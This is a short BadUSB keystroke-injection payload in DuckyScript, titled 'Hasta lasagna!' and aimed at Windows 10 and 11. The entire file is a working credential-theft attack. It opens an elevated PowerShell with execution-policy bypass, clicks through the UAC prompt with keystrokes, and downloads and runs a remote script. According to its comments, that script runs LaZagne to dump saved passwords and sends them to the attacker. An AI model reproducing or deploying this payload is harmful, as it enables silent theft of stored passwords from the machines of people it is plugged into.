REM TITLE "Hasta lasagna!"
REM AUTHOR m4ki3lf0
REM TARGET Approved on Win10, Probably working on Win11
REM DESCRIPTION This will download the password exfiltration script (your modified version for your preferred exfiltration method), download execute lazagne.exe save result to a file and send it to yourself
REM VERSION 1.0
DEFAULT_DELAY 300
DELAY 1000
GUI r
STRING powershell -exec bypass -NoP
CTRL SHIFT ENTER
DELAY 100
LEFT
ENTER
DELAY 100
STRING iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m4ki3lf0/BadUsbScripts/main/PasswordExfiltration/PasswordExfiltration.ps1')
ENTER